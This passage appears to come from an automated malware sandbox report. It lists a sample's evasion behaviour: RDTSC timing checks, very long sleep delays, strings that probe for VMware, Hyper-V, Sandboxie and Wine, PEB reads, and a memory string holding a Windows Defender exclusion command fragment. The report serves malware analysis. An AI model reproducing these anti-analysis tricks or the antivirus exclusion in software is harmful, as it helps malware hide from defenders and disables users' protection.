          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002D08604 second address: 0000000002D0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002D0899E second address: 0000000002D089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6916Thread sleep count: 576 > 30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239841s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6916Thread sleep count: 2157 > 30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6132Thread sleep time: -30220s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239718s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239610s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239499s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239391s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239266s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239094s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238968s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238844s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238733s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238609s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238500s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238390s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238157s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -237547s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -237110s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -236750s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -236641s >= -30000s
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 4676Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6524Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239841
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239718
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239610
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239499
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239391
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239266
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239094
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238968
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238844
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238733
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238609
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238500
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238390
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238157
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237547
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237110
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236750
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236641
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeWindow / User API: threadDelayed 576
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeWindow / User API: threadDelayed 2157
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239841
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 30220
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239718
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239610
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239499
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239391
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239266
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239094
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238968
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238844
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238733
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238609
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238500
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238390
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238157
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237547
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237110
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236750
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236641
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: msdt.exe, 0000000D.00000002.550902230.0000000000487000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWa Connection* 4
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.320269745.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000A.00000000.297282271.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.297282271.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000A.00000000.323358278.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yb3d8bb
          Source: msdt.exe, 0000000D.00000002.550902230.0000000000487000.00000004.00000020.sdmp, msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01963884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01963884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01900050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01900050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01913B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01913B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01903A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01924A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01924A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01974257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]
